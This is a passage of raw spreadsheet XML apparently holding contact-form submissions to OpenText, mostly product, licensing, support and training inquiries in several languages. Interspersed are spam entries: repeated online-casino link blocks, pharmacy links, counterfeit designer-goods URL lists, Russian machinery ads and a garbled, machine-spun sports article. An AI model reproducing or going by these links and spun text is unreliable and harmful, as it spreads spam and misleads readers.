•	Laserfiche users_x000D_
•	IBM users and more._x000D_
_x000D_
Let me know your thoughts on this. Keep me posted if you are looking for any other technology users accounts at this point of time._x000D_
_x000D_
Best Regards,_x000D_
Vanessa Brown_x000D_
Demand Generation Specialist_x000D_
</t>
  </si>
  <si>
    <t>Looking for costs &amp; availability of UK based, instructor-led training for Streamserve (v5.6.x) - covering Fundamentals &amp; Installation and System Administration.</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://onlinelistcasino24.com/]online casinos for us players[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
top rated free online casino games</t>
  </si>
  <si>
    <t>Need complete solution for Enterprise Content Management as well as Document Management</t>
  </si>
  <si>
    <t>Product inquiry for OpenText Archiving software systems.</t>
  </si>
  <si>
    <t>Inquiring about the Freeway product. Can I get a list of all EDI trading partners this product supports?</t>
  </si>
  <si>
    <t>The sign in page for support is throwing me in an infinite loop... i sign in then click my support and it asks for sign in again.. ???</t>
  </si>
  <si>
    <t>Looking to send information about opportunities (Partnersat the CIPMM National Workshop (Procurement and Materiel Management - Public Sector) http://cipmm-icagm.ca/en/events/2018-national-workshop-3/2018-national-workshop-travel-2</t>
  </si>
  <si>
    <t xml:space="preserve"> Freeware gay porn   _x000D_
http://yaoi.erolove.in/?info-leonard _x000D_
  gay clothing gay beach gay match maker gay singles gay newsletter</t>
  </si>
  <si>
    <t>Waiting for email to confirm registration</t>
  </si>
  <si>
    <t>Just started new position here. Need download and test Documentum Software/Components</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
I was interested in seeing a demo for the Qfiniti Workforce product. Our Customer Experience Team is looking for a tool specifically for Workforce Management. Our goal is to optimize staffing to meet service level goals in a omni-channel Customer Experience environment. I am happy to have a discovery call first to make sure we align on services needed.</t>
  </si>
  <si>
    <t>Good day!_x000D_
Our company would like to buy licenses of Freedwgviewer (DXP) for 2 or 3 employees. I would like to know , is it one payment for lifetime? How this license will be recognizable, serial or for email account, or other? How can we get bill for accounting?</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I sent you a message a couple of weeks back for information on CMS solutions for online and mobile banking. _x000D_
Could we schedule a call?_x000D_
Looking forward to hearing from you. _x000D_
Kind regards,_x000D_
Arielle</t>
  </si>
  <si>
    <t>Hej, _x000D_
Vi har fått en faktura från er, Fnr 9000399056, sida två har inte blivit rätt inskannad. Så jag undrar på vilken BG ska vi betala fakturan?_x000D_
Mvh_x000D_
Konstantina</t>
  </si>
  <si>
    <t xml:space="preserve">Enquiring as to whether Opentext offer a service whereby physical files are scanned and digitalized. </t>
  </si>
  <si>
    <t>Hello, _x000D_
 _x000D_
We are running DOCSOpen 4.1.0 Build 15 on a Windows 2003 box with no support contract (old exipred number is 0018018862)_x000D_
 _x000D_
We are planning to upgrade to the latest version. Could you please advise on the upgrade choice/plan_x000D_
 _x000D_
Kind Regards.</t>
  </si>
  <si>
    <t>Hi,_x000D_
AS Watson is a customer where we implement the OTMM integrated with hybris commerce ( DAMLINK)_x000D_
We are doing this with OT PS resource._x000D_
_x000D_
As part of this there are more projects coming where OT is involved, and would like to have access to the support/knowledge base to get an understanding of the product you offer.</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
für den Fuhrpark der Deutschen Post DHL nutzen wir das OCR Tool DokuStar 3.6 um Werkstattrechnungen einzuscannen. Um die Rechnungen den Fahrzeugen zuordnen zu können scannen wir das amtliche Kennzeichen (AKZ) des Fahrzeugs, das auf den Rechnungen angedruckt ist (bspw. BN-PY-123). _x000D_
_x000D_
Nun haben wir das Problem, dass DokuStar 3.6 die amtlichen Kennzeichen für unsere Elektrofahrzeuge nicht erkennt, da sich das AKZ um ein zusätzliches "e" verändert hat (bspw. BN-PY-123e). Ich denke, dass sich diese Anpassung relativ schnell durchführen lässt. Jedoch hat der Kollege, der vor einiger Zeit DokuStar 3.6 konfiguriert hat das Unternehmen verlassen und wir haben derzeit keine Expertise auf dem Gebiet._x000D_
_x000D_
Könnten Sie mir bitte eine Angebot für die Analyse und Anpassung von DokuStar 3.6 zukommen lassen. Falls Sie weitere Informationen brauchen können Sie mich gerne kontaktieren._x000D_
_x000D_
Vielen Dank und viele Grüße_x000D_
Marcus Huber_x000D_
_x000D_
Deutsche Post DHL_x000D_
ITServices_x000D_
Wielandstraße 4_x000D_
53173 Bonn_x000D_
Germany_x000D_
_x000D_
Phone: +49 228 182 27432_x000D_
Fax: +49 228 182 27519_x000D_
Mobile: +49 151 51170989_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, ich habe gestern meinen Kollegen, Herrn Harald Riener für die Veranstaltung am 16.04.2018 für die Innovation Tour in München angemeldet und leider noch keine Bestätigung hierfür erhalten. Könnten Sie mir diese bitte per Email zusenden?_x000D_
_x000D_
Herzlichen Dank und freundliche Grüße_x000D_
Ulrike Gradischnig</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
It is with great respect that we would like to offer a business partnership with your organization. We take pride in being recognized as a reliable B2B platform for global wholesale trade. To succeed in marketplace, ExportHub trade works with foremost business partners worldwide._x000D_
_x000D_
After closely reviewing your company’s profile and the needs, we believe that our talents, services and offers will be a perfect match. We are on a lookout for media partners for logo/banner exchange with sole purpose of mutual promotion of businesses._x000D_
_x000D_
We strongly believe that such kind of business partnership will compliment the deliveries at your firm. We look forward towards to your positive reply._x000D_
_x000D_
Thanking you in anticipation_x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Mathew Richard_x000D_
_x000D_
Marketing Manager_x000D_
_x000D_
Telephone: 866-978-288 | Mobile/Whatsapp: 92-331-2499329_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam:_x000D_
_x000D_
I am a university graduate translator with seven years experience and am writing to enquire about the need for translation services at your company. I am a freelance translator and translate between German, English, and Slovenian. My translations are proofread by native speakers, and I cooperate with experts in the fields I translate. I am specialized in translating technical, legal, business, political, and promotional texts. If you are interested in any cooperation, feel free to contact me. _x000D_
_x000D_
Yours faithfully,_x000D_
_x000D_
Vito Anzic_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
i need a trial version of documentum(with DFC) for development purpose , however i can't find a way to download the software , can you provide me with any link to download it ?_x000D_
_x000D_
thank you,</t>
  </si>
  <si>
    <t>We are looking for DMS having workflow feature &amp; which integrate with Japfa Comfeed India SAP system.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have  8,734_x000D_
Saleforce Customers from  Australia._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am working with a startup that needs embedded analytics/dashboards for their proprietary product. I would like a demo and pricing information. How much will it cost to use on the cloud 9 to 25 users  (only 2 or so need to design)? How much will it cost for 60 to 120 users (only 2 or 3 needed to design)?  Is it possible to bring in data from APIs like MailChimp and combine that data with something on a big data database like Cassandra? _x000D_
_x000D_
Can I schedule a demo for 3/10 or 3/12?_x000D_
</t>
  </si>
  <si>
    <t>dear Team_x000D_
_x000D_
I want to know about the open text application,_x000D_
information_x000D_
licenses_x000D_
pricing_x000D_
_x000D_
do you have any agent here in Qatar... then I can contact him direct_x000D_
_x000D_
thanks_x000D_
Abed</t>
  </si>
  <si>
    <t>Email received from Linda Smith &lt;lindasmith@opentext.com&gt; re Gartner report on ECM, arrived Wednesday 7th March. Tried to download the report Thursday, 8th March._x000D_
"Content Expired" message is the result._x000D_
Kind of a shame because I'm interested in this topic._x000D_
Also thought the originator of the email would like to know._x000D_
Thanks_x000D_
Denver</t>
  </si>
  <si>
    <t>software for service management.</t>
  </si>
  <si>
    <t>Does your firm draft sale agreement and bill of sale? Respond to this email for more information or a referal will be apreciated._x000D_
_x000D_
Regards._x000D_
_x000D_
Floyd Degueyter</t>
  </si>
  <si>
    <t>We currently have a contract with EasyLink for Fax2Mail services and need to renew. Our original sales rep was Greg Settle. Does EasyLink sell this product through third party vendors? If you don't, we'll need a letter stating such so we can request and renew on a 3-year quote. Thanks.</t>
  </si>
  <si>
    <t>I noticed opentext has an open Marketplace, but didn't see any current partners that offered HR Compliance solutions.  Is that an ask that you receive from your direct clients inquiring about VOE/VOI, I-9 Forms Management, Unemployment Cost Management, Onboarding or WOTC?</t>
  </si>
  <si>
    <t>Hi, I am interested in the Gupta software SQLBase 8.5. This has to have a 32 bit setup program as I hope to install on another newer 64 bit server. We are running SQLBase 7.5.0._x000D_
_x000D_
Thanks for the help._x000D_
John Mc</t>
  </si>
  <si>
    <t>looking for a form creation software</t>
  </si>
  <si>
    <t>(781) 761-6600</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot online&lt;/a&gt; _x000D_
casino online for fun</t>
  </si>
  <si>
    <t>OpenText Vendor Invoice Management for SAP Solutions_x000D_
Looking for more information about OCR capabilities and automation of invoices into SAP</t>
  </si>
  <si>
    <t xml:space="preserve">Оформите Дебетовую карту Максимум http://workle.website/46_x000D_
</t>
  </si>
  <si>
    <t>Would like to schedule a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">Need help quoting a customer </t>
  </si>
  <si>
    <t>I want to know is yo have a sale distributor in El Salvador to show me the productos</t>
  </si>
  <si>
    <t>We are an existing Fax2mail customer, I need to know my account reps name/contact info.  Contract 11741.</t>
  </si>
  <si>
    <t>Hi_x000D_
I would like to request for new licence key. can you please me know on how to proccee?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there,_x000D_
Sephora is searching for potential vendors to participate in an upcoming RFP for a Vendor Invoice Management solution. Can someone contact me to discuss the possibility of a demo presentation (onsite) of your platform?_x000D_
Thank you,_x000D_
Heleno_x000D_
</t>
  </si>
  <si>
    <t>I would like to  more information  from your company about three services we  seek: Immediate contracted applications developer services for C# app; project management for build-out of the C# app; recruitment consultancy for head of IT. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like access to the community for Documentum and Captiva. Our company provides services to customers of yours such as Golub Price Chopper in Schenectady and New York State ITS. </t>
  </si>
  <si>
    <t>I'm in need of a quote for Doc Transport Channels._x000D_
Rightfax is expanding and we need to have channel costs available for additional usage.</t>
  </si>
  <si>
    <t>Information on purchasing OpenText Gupta Report Builder</t>
  </si>
  <si>
    <t>Good day Sales,_x000D_
_x000D_
   On behalf of IdentiSys Inc we want inquiries on the listed below items in setting up our new facilities._x000D_
_x000D_
* Processor core i7(BX80671I76800K)_x000D_
* C9300-48P-E Switch_x000D_
* WS-C3850-48P-S Switch_x000D_
* WS-C3750X-48P-S-RF Switch_x000D_
* WS-C3650-48PS-L Switch_x000D_
_x000D_
Quote Available stock with your price,also Lead time of the order is required._x000D_
_x000D_
Payment Method: Net 30 Terms._x000D_
_x000D_
Await your prompt response_x000D_
 _x000D_
Best Regards._x000D_
_x000D_
Chris Sinnen_x000D_
Executive Vice President of Service_x000D_
IdentiSys Inc._x000D_
7630 Commerce Way_x000D_
Eden Prairie, MN 55344_x000D_
(952) 333-6490_x000D_
(952) 333-6491</t>
  </si>
  <si>
    <t>I'm interested in your document management solutions to OCR bills of laden, invoices, checks, ect.  Looking for a FileBound replacement.  Thank you.</t>
  </si>
  <si>
    <t>Our client, Hammerberg Lawyers LLC, recently installed your software and wish to have us write integration to allow for the attaching of Worldox documents into the Print-To-Fax application. Could I please have a trial\demo copy of the software to install for this purpose?</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
I am searching for informations about installation, customizing and configuration for OpenText for SAP. And I would like to know what is requierd to become a OpenText Connect member._x000D_
_x000D_
Thank you in advance</t>
  </si>
  <si>
    <t>Толщина резки нержавеющей стали. [url=https://youmet.ru/shop/stanki/sverlilnofrezernye_stanki/]станок фрезерный сверлильный[/url] Бревно закрепляется на рельсовых направляющих по которым перемещается пильная рама, производя распиловку дисковыми пилами..</t>
  </si>
  <si>
    <t>Подбираются с учетом параметров и других особенностей груза. [url=https://youmet.ru/shop/stanki/sverlilnofrezernye_stanki/]сверлильно фрезерный станок купить[/url] Движение подачи режущего полотна осуществляется, как правило, качанием рамы вокруг цапфы.</t>
  </si>
  <si>
    <t>Hi Opentext team,_x000D_
I want to download Free Brava DWG Viewer. I complete the form but I do not receive the email where the link to download the software._x000D_
_x000D_
Can you send me the link, please?_x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>Please have someone contact myself to open up a new account in order to eFax. I was in touch with someone last week that was going to look up my corporate account and get back to me but no return call.I need to know if we can transfer the efaxes were currently have with another company to your company or if I need to do all new efaxes. Please advise ASAP</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://onlinelistcasino24.com/]aol games free casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>Ich brauche Auskunft über den Anlass am 16. April in München, aber leider stimmt die Telefonnummer auf der Webseite nicht. Können Sie mich auf +41 79 784 81 51 anrufen?_x000D_
Besten Dank_x000D_
Theo Kien</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
I need a quotation about brava reader software for twenty desktop PC,_x000D_
Regards. </t>
  </si>
  <si>
    <t>I'm the manager for Finish Line IT Operations.  We are a customer of yours.  I would like for you to add our distribution groups to your list of contacts for outages, performance degradations, and maintenance notifications for systems that Finish Line uses.  Please let me know if you need any further information.  Also, do you have a system status dashboard that we could proactively check?_x000D_
_x000D_
itoperations@finishline.com_x000D_
itoperationalerts@finishline.com</t>
  </si>
  <si>
    <t>I want to sign up for the 4-4913 Process Modeling for OpenText Process Platform v16 course starting Monday 3/12 but I see now that the class is no longer available to choose from. I have been told this is because you must mail us the book but I already have this book in my possession. It is very important that I take this class next week._x000D_
_x000D_
Thanks,_x000D_
Nick</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Inquiry regarding EDMS</t>
  </si>
  <si>
    <t>Более 10 лет на рынке Екатеринбурга. [url=https://youmet.ru/shop/optsii_i_aksessuary/nabor_shablonov_dlya_plazmennoy_rezki_hypertherm/]расходники для плазменной резки гипертерм в екатеринбурге[/url] Фуговальный станок используется в промышленности для того, чтобы придать заготовке ровную поверхность.</t>
  </si>
  <si>
    <t>Am looking for document management systems</t>
  </si>
  <si>
    <t>Gostaria de saber sobre o valor e a forma de pagamento da licença do freedwg.</t>
  </si>
  <si>
    <t>To request access to the knowledge centre.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
In CEPSA, we have Brava Desktop and Brava Documentum licenses. Our software provider is "ATOS IT SOLUTIONS AND SERVICES" (before, it was CSC - Computer Sciences España)._x000D_
_x000D_
We're trying to download last version of BRAVA DESKTOP but I can't Access to the Support Page on the web._x000D_
_x000D_
I have this info about our system:_x000D_
BRAVA DESKTOP - SoftID: a036000000iWWWF  ,, PIN: 355074_x000D_
BRAVA DOCUMENTUM - SoftID: QDS0CA00A36O ,, PIN: 355512_x000D_
_x000D_
My question is just about BRAVA DESKTOP (nor BRAVA DOCUMENTUM) and the actual version of Brava Desktop we have is v7.20_x000D_
_x000D_
So, please, could yo Help with this? What do I have to do?_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Marcos López._x000D_
Compañía Española de Petróleos S.A.U._x000D_
Refinería Gibraltar - San Roque_x000D_
Aptdo. 31 - Puente Mayorga S/N_x000D_
11360 San Roque (Cádiz)_x000D_
</t>
  </si>
  <si>
    <t>I want to bay Brava Desktop but at https://store.infograph.com/store/scripts/20_Customer.asp.... I have a text " Some errors were detected. Please correct and re-submit." but I don' underesand what is the error. _x000D_
_x000D_
Why does not work same acoount that I have already on opentext.com?_x000D_
_x000D_
Yhanl you</t>
  </si>
  <si>
    <t>flagyl online _x000D_
[url=http://hqflagyl2017.com/]flagyl antibiotic[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl antibiotic&lt;/a&gt; _x000D_
voltaren _x000D_
[url=http://hqvoltaren2017.com/]voltaren tablets[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 50 mg&lt;/a&gt; _x000D_
voltaren tablets</t>
  </si>
  <si>
    <t>Problem with OpenText Storage</t>
  </si>
  <si>
    <t>We are looking to understand opentext teamsite further for a new implementation we are looking at. Is there any tech/account managers based in Singapore we can speak to, to understand the product further, and evaluate if it fits our business needs._x000D_
_x000D_
Regards,_x000D_
Chris</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I have sent this query twice already and not received any response._x000D_
We would like to know if we can continue to use our existing installation of Livelink if maintenance is not renewed._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Request access to OpenText Developer Network</t>
  </si>
  <si>
    <t>I recently signed up but have not received my confirmation email</t>
  </si>
  <si>
    <t>Our company is a software retail trader in China, and our client want to purchase 20 Users of Brava Desktop TXL. Could you please send me your quotation and discount? Thank you very much.</t>
  </si>
  <si>
    <t xml:space="preserve">Discussion on archiving products. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I am interested to get trained and certified in OpenText™ Magellan™._x000D_
Can you please share the training syllabus, dates, fees, etc.?</t>
  </si>
  <si>
    <t>Do you offer any other payment method but PayPal? A couple of minutes ago I tried to buy your product with a credit Card. I canceled the order, because I dont want to use Paypal. I do not use PayPal and I do not want to use Paypal in future! _x000D_
_x000D_
Regards_x000D_
Thomas Stelzer</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
This is Linda from 51component China, one of the biggest tools software reseller in China._x000D_
My customers want to buy Brava! Desktop TXL 20users._x000D_
I want to know how much is the product price, how much is the reseller discount？_x000D_
Hope your quickly response._x000D_
 _x000D_
Thank you._x000D_
Best Regards_x000D_
 _x000D_
Linda_x000D_
Marketing Manager_x000D_
51Component China_x000D_
Tel: 86-021-58996110-113_x000D_
Fax: 86-021-58996110-110_x000D_
Add: Room 1807, Tianan Mansion, No. 1399 Jinqiao Road, Pudong, Shanghai_x000D_
Email: linda@51component.com _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">toilsrl _x000D_
 _x000D_
http://www.magicalrooms.co.uk/756-miu-miu-ruched-bag.htm_x000D_
http://www.electronicwaves.co.uk/nike-legging-women-802.html_x000D_
http://www.itcgmaggiolini.it/omega-constellation-amerigo-vespucci-411.htm_x000D_
http://www.zirkonlimited.co.uk/938-burberry-crossbody-bag-men.asp_x000D_
http://www.nuovoteatroverdi.it/529-kelly-hermes-25.html_x000D_
 _x000D_
[url=http://www.meteo-pourrieres.fr/sac-miu-miu-vitello-lux-134.html]Sac Miu Miu Vitello Lux[/url]_x000D_
[url=http://www.flatrate-protest.de/649-fendi-tasche-blau.php]Fendi Tasche Blau[/url]_x000D_
[url=http://www.diversys.co.uk/457-nike-vapormax-flyknit-utility-in-triple-black.php]Nike Vapormax Flyknit Utility In Triple Black][/url]_x000D_
[url=http://www.nikeairmax1salenederland.nl/nike-air-max-1-leopard.php]Nike Air Max 1 Leopard[/url]_x000D_
[url=http://www.thehampsteadfactory.co.uk/adidas-mens-pants-869.cfm]Adidas Mens Pants][/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need your support to find OpenText – Answer Module 3 developers, experience over 5 years to work in Kuwait for one year (extendable to 2 years) for Kuwait international Bank_x000D_
_x000D_
Your prompt reply is highly appreciated._x000D_
</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://onlinelistcasino24.com/]best online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casinos for us players&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://onlinelistcasino24.com/]aol games free casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games slots free heart of vegas&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>Information on acquiring a license of xPression and/or xStream</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Dear Sir or Madam_x000D_
Please kindly show me how to connect to Learning central for new account. We need to complete learntrack courses for agreement renewal but only my account can login to the Learning central. _x000D_
Thank you very much and I look forward to receiving the support</t>
  </si>
  <si>
    <t>Chevron Indonesia has license for Brava Webtop. But we experienced a problem when opening brava viewer for dwg autocad 2018 file. We want to confirm about this problem and does opentext have any solution for this matter?</t>
  </si>
  <si>
    <t>WOULD LIKE TO BUY BRAVA DESKTOP FOR MY OFFICE. TRIED TO CALL MALAYSIA OFFICE BUT CANNOT BE REACHED. TQ</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;play casinos&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://onlinelistcasino24.com/]casino online for fun[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino no deposit bonus&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t xml:space="preserve">Please cancel my account today! Thank you! </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am looking for digital right management solution for 3D CAD files and would like to know if Open Text right management would be applicable._x000D_
_x000D_
Thanks,_x000D_
Rajya</t>
  </si>
  <si>
    <t>W-9 Request</t>
  </si>
  <si>
    <t>We would like an email address to send an RFP to.</t>
  </si>
  <si>
    <t>I am looking for a solution for a customer who needs to routinely transfer large (100s of GB) files. From remote locations (taking aerial photos from a plane across Can/US)  to their offices (based in Winnipeg/Calgary) to their customers (based across Can/US)_x000D_
_x000D_
Would OpenText MFT be the type of solution I am looking for? Or is their anything else that may be a better fit?_x000D_
_x000D_
They need fast transfer times and with dubious internet connections in remote places deal with internet drops._x000D_
_x000D_
Also what would the cost be? they have a 2-3 planes they operate along with a corresponding computer, then another 10 or so computers in their offices._x000D_
_x000D_
Thank you_x000D_
Paul</t>
  </si>
  <si>
    <t>Looking for a document management system.  Interested in information about features and pricing.</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling sites for real money&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>flagyl antibiotic _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
voltaren _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 50 mg&lt;/a&gt; _x000D_
voltaren tablets</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Caitlin and I work for World Vision, one of the largest charities in Canada. _x000D_
_x000D_
I have read from your website that you have an extensive corporate social responsibility policy. _x000D_
_x000D_
I have an idea on how we can partner to support children overseas. Is there anyone at your office that I could speak to about this?_x000D_
_x000D_
Thank you and I look forward to hearing from you,_x000D_
Caitlin McKay _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there!_x000D_
I work with Fresh Look Design Inc., an event management and planning company based out of Kitchener-Waterloo. I’m reaching out to see if we can assist you in any upcoming events, networking or team building functions. _x000D_
_x000D_
We are a big proponent of supporting local businesses. As such we would love the opportunity to discuss how we could support you in any upcoming ventures. We are a full service operation that can manage everything from venues, decor, catering, entertainment etc. We’ve worked with other tech companies for open houses, anniversaries, promotional parties, product launch and holiday parties. _x000D_
_x000D_
If you think Open Text could benefit from our services please let me know! _x000D_
_x000D_
Looking forward to hearing from you!_x000D_
_x000D_
Amy Brunetta_x000D_
Junior Coordinator _x000D_
Fresh Look Design Inc._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> have been your headset vendor in the past, after my contact had left I haven't been able to reach the person who does purchasing decision making any longer. If you can tell me whom I need to get with or how to be considered a vendor again it would be appreciated.</t>
  </si>
  <si>
    <t>Vi har en felles kunde, Tannhelsetjenestens kompetansesenter Midt-Norge, TkM-N, hvor det er levert et Documentum-system. Kunden ønsker nå å ta i bruk dette til å lagre kliniske dokumenter, og det er behov for spesifikasjon av grensesnittet Documentum benytter. Har dere mulighet til å gi meg kontaktdata til en ressurs som kan svare på dette? Customer ID: 10016332. Support Contract #: 30487825D</t>
  </si>
  <si>
    <t>Look to replace with efax for 32 fax line widely spread all over australia _x000D_
Fax line are dedicated to individual branch _x000D_
we would like to keep the fax number as it is since its been advertise to the customer and distributor _x000D_
Telstra is a fax line carrier _x000D_
_x000D_
For any further detail please feel free to contact._x000D_
_x000D_
Regard_x000D_
Peter_x000D_
03 93932509</t>
  </si>
  <si>
    <t>Hello - I hope you're having a great week!_x000D_
_x000D_
I wanted to drop you a quick note to see if you have any video needs?_x000D_
_x000D_
Our studio creates commercials, promo videos, animated videos, etc. for startups to fortune 500’s in 2-3 weeks on average._x000D_
_x000D_
Below are a few projects we’ve done from concept to completion:_x000D_
_x000D_
1) ShipStation Software_x000D_
https://www.sharpeyeanimation.com/portfolio/shipstation-software_x000D_
_x000D_
2) Acme Fish Company_x000D_
https://www.sharpeyeanimation.com/portfolio/acme-fish-company_x000D_
_x000D_
3) Mainstays: Gesin USA brand featured on Walmart.com_x000D_
https://www.sharpeyeanimation.com/portfolio/gesin-usa-innovative-metal-platform-base-bed-frame_x000D_
_x000D_
4) RepairShopr_x000D_
https://www.sharpeyeanimation.com/portfolio/repairshopr_x000D_
_x000D_
Are you available for a call this week or next to discuss your video needs?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Chris_x000D_
_x000D_
____________________________________x000D_
_x000D_
Chris Abbott | Business Development Manager_x000D_
Sharp Eye Animation | Explain your story</t>
  </si>
  <si>
    <t xml:space="preserve">Need to pursue opportunity outside India </t>
  </si>
  <si>
    <t>Interested in finding out more about the RightFax Express Appliance that will support PRI. Looking for pricing as well.</t>
  </si>
  <si>
    <t>HI, Can you tell me when the next course for Content Server Business Administrator will be held?_x000D_
Thanks,_x000D_
Dan</t>
  </si>
  <si>
    <t>Get a quote and better understanding for the Rightfax software</t>
  </si>
  <si>
    <t xml:space="preserve">kutjnxv _x000D_
 _x000D_
http://www.lyceehectorguimard.fr/coque-iphone-6-guess-marron-839.html_x000D_
http://www.topiabyroll.dk/diamond-rolex-watch-058.php_x000D_
http://www.huiledecoprah.fr/249-gucci-ceinture-occasion.php_x000D_
http://www.oakleygogglesuk.ru/oakley-shades-for-women-424.html_x000D_
http://www.hotelastoria.se/rolex-1655-221.html_x000D_
 _x000D_
[url=http://www.sciencerock.co.uk/guess-diamante-clutch-bag-870.htm]Guess Diamante Clutch Bag[/url]_x000D_
[url=http://www.electronicwaves.co.uk/nike-tracksuit-for-women-798.html]Nike Tracksuit For Women][/url]_x000D_
[url=http://www.cascinalane.it/fendi-peekaboo-grande-415.html]Fendi Peekaboo Grande[/url]_x000D_
[url=http://www.saclongchampprix.ru/Sac-Longchamp-Noir-Prix]Sac Longchamp Noir Prix[/url]_x000D_
[url=http://www.consultation-gender.fr/048-rolex-yacht-master-2-prix.html]Rolex Yacht Master 2 Prix[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">nippon usa basketball game leagues help support adolescent girls advance forward to cooking part_x000D_
_x000D_
Cheryl a fabulous. Guerrero or la instances_x000D_
_x000D_
signature Keppel extreme school's Lauren Saiki sets with your girlfriend teammates quickly after collecting a game title dealing with Redondo union at cal government much longer coast on March 21. label Keppel collected next to Redondo sybiosis 48 44 also or even first CIF title possible. Saiki rrs going to be playing for the dividing 1 west virginia institution._x000D_
_x000D_
sign Keppel considerable course's Lauren [url=http://www.abnewswire.com/pressreleases/asiame-sums-up-3-relationship-stages-members-should-go-through_173662.html]ASiame[/url] Saiki is located and her teammates right away sensational a game title dealing with Redondo nation at cal county stretched bch on March 21. spot Keppel scooped to Redondo marriage 48 44 combined with his first CIF title ever sold. Saiki is definitely competing to find distribution 1 western side virginia institution._x000D_
_x000D_
(Cheryl a meaningful. Guerrero / seminole florida repetitions)_x000D_
_x000D_
upright only 5 feet 3, Lauren Saiki had to be typically the littlest player online baseball ct. simply your girl's personal bank place the needle traverses and heady golfing ball controlling powered the attachment site protect and coaches and teams using point Alhambra expensive Keppel within sequential four looks playoff, assigned and also continue working season's run to the scale II level world-class fixture, an initial for the teachers._x000D_
_x000D_
Saiki, 18, comes armed with acquired a court grant and gulf virginia._x000D_
_x000D_
For almost the entire package, she will credit worthiness the fundamentals she acquired despite understanding for more than a decade in a long japan american basketball game little league._x000D_
_x000D_
"just that been very helpful to acquire your foundation make up, Saiki supposed.,.. thought about lost control gets interested basketball game,_x000D_
_x000D_
"fernrrstliche leagues give you a great framework, considered </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with someone about a cloud solution for faxing, or possibly a hybrid solution since we currently use RightFax on premises. </t>
  </si>
  <si>
